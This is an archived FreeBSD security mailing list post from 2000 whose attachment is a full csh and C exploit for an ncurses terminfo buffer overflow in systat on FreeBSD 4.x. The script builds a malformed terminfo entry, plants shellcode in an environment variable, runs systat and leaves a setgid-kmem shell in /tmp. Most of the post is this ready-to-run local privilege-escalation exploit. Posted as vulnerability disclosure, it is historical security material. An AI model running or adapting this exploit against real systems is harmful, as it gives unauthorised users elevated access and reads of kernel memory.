Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 10 Oct 2000 16:07:37 +0200
From:      Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To:        freebsd-security@freebsd.org
Subject:   Re: ncurses buffer overflows (fwd)
Message-ID:  <20001010160736.N94343@riget.scene.pl>
In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700
References:  <200010101403.e9AE3Ir08713@cwsys.cwsent.com>
index | next in thread | previous in thread | raw e-mail 

[-- Attachment #1 --]
On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> For those of you who don't subscribe to BUGTRAQ, here's a heads up.

And the exploit (in attachment).

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

[-- Attachment #2 --]
#!/bin/csh

##############################################################################
# (c) 2000 Przemysław Frasunek <venglin@freebsd.lublin.pl>                   #
#                                                                            #
# FreeBSD 4.x systat gid=kmem exploit                                        #
# Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI>                               #
#                                                                            #
# Dedicated to ksm.                                                          #
#                                                                            #
# Nudziło mi się w szkole, toteż napisałem sploita na angielskim. :)   	     #
##############################################################################

cat << __EOF__ > /tmp/xx
#!/bin/csh

cp /bin/csh /tmp
/usr/sbin/chgrp kmem /tmp/csh
chmod 2755 /tmp/csh
__EOF__

chmod 755 /tmp/xx

cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>

#define OFF -400
#define ALIGN 516

long getesp(void)
{
	__asm__("movl %esp, %eax\n");
}

int main(void)
{
	/* precompiled malformed terinfo binary */

	char evilcap[] =
	"\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
	"\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
	"\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
	"\x6d\x69\x6e\x61\x6c";

	char retbuf[5];
	long ret = getesp() + OFF;
	int i;

	write(2, evilcap, sizeof(evilcap)-1);
	for (i=0;i<39;i++) write(2, "\0", 1);
	for (i=0;i<86;i++) write(2, "\xff", 1);
	write(2, "\0\0", 2);
	for (i=0;i<750;i++) write(2, "\xff", 1);
	for (i=0;i<ALIGN;i++) write(2, "a", 1);
	sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff),
		(((int)ret & 0xff00) >> 8),
		(((int)ret & 0xff0000) >> 16),
		(((int)ret & 0xff000000) >> 24));
	write(2, retbuf, 5);
}
__EOF__

cc -o /tmp/s /tmp/sploitte.c
cd $HOME
mkdir -p .terminfo/s
setenv TERM screen
/tmp/s >& .terminfo/s/screen
setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
/usr/bin/systat >& /dev/null
rm -f .terminfo/s/screen
ls -la /tmp/csh
rm -f /tmp/xx /tmp/s /tmp/sploitte.c
help

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001010160736.N94343>